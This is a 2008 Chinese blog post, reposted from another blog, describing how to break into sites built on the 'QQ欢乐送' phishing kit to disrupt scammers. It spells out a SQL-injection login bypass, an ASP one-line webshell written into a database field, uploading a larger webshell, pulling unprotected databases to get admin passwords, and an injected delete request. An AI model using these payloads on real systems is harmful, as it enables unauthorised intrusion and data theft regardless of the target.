首页 > 网络安全 > 总结下"QQ欢乐送"这个钓鱼程序的漏洞

总结下"QQ欢乐送"这个钓鱼程序的漏洞

2008年6月22日 发表评论 阅读评论

ps: 最近加我好友,然后发送这些中奖信息的也超多,所以偶也弄了他几个站。。。拿到几个源代码收藏下!

来源:malt's blog
“QQ欢乐送”是我见过这套程序使用最多的标题,具有一定的代表性,所以就拿这个做代号..今天主要来说下如何入侵这套系统达到狙击钓鱼站的目的.
这套程序一共有两个版本(至少我见过就是两个版本)
一套界面风格比较好看一点.    

这套主要是利用默认数据库,然后在填写资料页面向数据库写入一句话木马.因为数据库是ASP格式,所以能执行我们想要它执行的命令…首先要输入你获取骗子发来的验证码.才能到达填写资料的页面,这里如果你不知道验证码,你就直接输'or' 绕过(当初我本来是要输'or''='   但是发现文本框限制了长度,只能输入4位.好吧,.就输'or' 没想到也能构成个无错查询数据库的语句,而且因为有OR这个或者的条件,所以就能进去),然后把一句话 <%execute(request("cmd"))%>
写到通信地址那,(为什么是这,因为其他地方限制了长度.搞本地提交麻烦)

提交以后就行了。默认数据库是这data/uyuan.asp        

访问它,把网页拉到最下,看看是否成功.

出现

Microsoft VBScript 运行时错误 错误 '800a000d'

类型不匹配: 'execute'

/qq3/data/uyuan.asp,行 836

就是成功了。然后用一句话连接端去连接

网站基本信息已经出来了。路径:D:\hosting\wwwroot\qqvip88_com\htdocs\qq3\

然后把功能切换到创建文件那.文件名写上D:\hosting\wwwroot\qqvip88_com\htdocs\qq3\heihei.asp

heihei.asp 这个文件名你可以自己改..再把大马写上..好了。


有的时候他们会把默认数据库改掉,这个时候用这个办法就不行了。不过这套程序也有管理员登陆管理的功能,而且用的是不同的数据库.默认的管理员数据库路径mdb\guestbook.asp

没有防下载功能,直接可以用下载工具下载回来.管理员密码放在user表里,不过这个表是坏的.意思是说用数据库浏览器是读不出数据的,要用执行SQL语句才能读出来.SELECT * FROM [user]这里是用明小子的Domain3.5 读的

账号:1 密码:1   白痴型的…直接找后台登陆adminlogin.asp

把一句话写上,然后拿一句话连接端mdb\guestbook.asp就可以了。两种办法…

好了。说完这个漂亮的程序,在来说说那个界面比较丑的程序怎么个黑法

这套程序通体比较喜庆,比较卡.基本上我电脑不敢访问,运用大量特效代码.和FLASH…

打开源文件直接搜索 javascript:validate(text1.value,   跟后后面的就是4位验证码了。

然后登陆,基本上步骤和上面的一样了。就不多说了。

还有骗子察看上当信息列表的地方是任何人都能看的

list.asp这个文件

如果list.asp被改名字了。就访问delete.asp?id=1 or 1=1

这个删除纪录的页面会自动转向列表页面.

管理员登陆页login.asp

想知道密码就下载默认的数据库data\huiyuan.mdb

user表里有./…哎,.漏洞太多太多了。 ..真的很差劲,

做这个程序的程序员水平也太差劲了。使用这程序的人一般是不怎么懂电脑的

所以这些默认数据库路径都没改..基本上都是有漏洞…来一个杀一杀….大家有兴趣就按我提供的办法去和谐他们吧…也许你会问我怎么知道他的默认数据库,我一开始也不知道,是通过旁注进去的,然后就分析了几下他的程序,没想到漏洞那么多….好吧,就这样,,,

转载请注明:woyigui's blog [http://www.woyigui.cn/]
本文标题:总结下"QQ欢乐送"这个钓鱼程序的漏洞
本文地址:http://www.woyigui.cn/2008/06/22/QQ-send-joy/

分类: 网络安全 标签:
  1. woyigui_test
    2008年6月22日06:31 | #1

    测试一下。。

    [回复]

  2. 小问题
    2008年6月23日02:19 | #2

    它们怎么骗钱啊?

    即使有人按照说明填写了正确的信息?

    不明白中

    [回复]

    woyigui 回复:

    不明白。。。不过有的站是让填QQ帐户和密码来着。。

    [回复]

  3. shuai
    2008年6月23日14:08 | #3

    小伙子写的还真不错!!!!不知道是不是原创不是!!呵呵 ~~

    [回复]

    woyigui 回复:

    是不是原创,只要自己会了,就达到目的了。。

    [回复]

  1. 本文目前尚无任何 trackbacks 和 pingbacks.
*